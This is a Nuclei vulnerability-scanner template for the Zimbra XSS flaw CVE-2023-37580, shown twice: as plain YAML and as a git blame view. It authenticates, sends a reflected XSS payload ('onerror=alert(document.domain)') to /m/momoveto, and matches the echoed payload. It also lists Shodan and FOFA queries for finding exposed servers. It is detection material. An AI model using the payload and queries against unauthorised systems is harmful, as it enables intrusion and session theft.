nuclei-templates/http/cves/2023/CVE-2023-37580.yaml

id: CVE-2023-37580

info:
  name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).
  reference:
    - https://github.com/Zimbra/zm-web-client/pull/827
    - https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37580
    - https://wiki.zimbra.com/wiki/Security_Center
    - https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-37580
    cwe-id: CWE-79
    epss-score: 0.27921
    epss-percentile: 0.96384
    cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zimbra
    product: zimbra
    shodan-query: http.favicon.hash:475145467
    fofa-query: icon_hash="475145467"
  tags: cve,cve2023,zimbra,xss,authenticated,kev

http:
  - raw:
      - |
        POST /zimbra/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginOp=login&username={{username}}&password={{password}}&client=mobile
      - |
        GET /m/momoveto?st="><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '<img src=x onerror=alert(document.domain)>'
          - 'id="zMoveForm"'
        condition: and

      - type: word
        part: header_2
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100827d5ece159639db73db733f7fbfa1e4d9a26b777ed25cf397c95292b10264d00221008d3d293becf787b5258825710e133c1fdbeef6e582089fe02ccd907893231f73:922c64590222798bb761d5b6d8e72950
Create CVE-2023-37580.yaml (Zimbra XSS) 2023-08-01 05:26:17 +00:00			`id: CVE-2023-37580`

			`info:`
			`name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting`
			`author: ritikchaddha`
			`severity: medium`
			`description: \|`
			`Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: \|`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).`
Create CVE-2023-37580.yaml (Zimbra XSS) 2023-08-01 05:26:17 +00:00			`reference:`
			`- https://github.com/Zimbra/zm-web-client/pull/827`
			`- https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-37580`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`- https://wiki.zimbra.com/wiki/Security_Center`
			`- https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy`
Create CVE-2023-37580.yaml (Zimbra XSS) 2023-08-01 05:26:17 +00:00			`classification:`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
Create CVE-2023-37580.yaml (Zimbra XSS) 2023-08-01 05:26:17 +00:00			`cve-id: CVE-2023-37580`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cwe-id: CWE-79`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.27921`
			`epss-percentile: 0.96384`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cpe: cpe:2.3:a:zimbra:zimbra::::::::`
Create CVE-2023-37580.yaml (Zimbra XSS) 2023-08-01 05:26:17 +00:00			`metadata:`
TemplateMan Update [Tue Aug 1 07:02:52 UTC 2023] :robot: 2023-08-01 07:02:52 +00:00			`max-request: 2`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: zimbra`
			`product: zimbra`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`shodan-query: http.favicon.hash:475145467`
			`fofa-query: icon_hash="475145467"`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`tags: cve,cve2023,zimbra,xss,authenticated,kev`
Create CVE-2023-37580.yaml (Zimbra XSS) 2023-08-01 05:26:17 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /zimbra/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`loginOp=login&username={{username}}&password={{password}}&client=mobile`
			`- \|`
updated quote and space 2023-08-01 05:58:24 +00:00			`GET /m/momoveto?st="><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1`
Create CVE-2023-37580.yaml (Zimbra XSS) 2023-08-01 05:26:17 +00:00			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
updated quote and space 2023-08-01 05:58:24 +00:00			`- '<img src=x onerror=alert(document.domain)>'`
Create CVE-2023-37580.yaml (Zimbra XSS) 2023-08-01 05:26:17 +00:00			`- 'id="zMoveForm"'`
			`condition: and`

			`- type: word`
			`part: header_2`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Fri Dec 29 09:30:43 UTC 2023] :robot: 2023-12-29 09:30:44 +00:00			`# digest: 4b0a00483046022100827d5ece159639db73db733f7fbfa1e4d9a26b777ed25cf397c95292b10264d00221008d3d293becf787b5258825710e133c1fdbeef6e582089fe02ccd907893231f73:922c64590222798bb761d5b6d8e72950`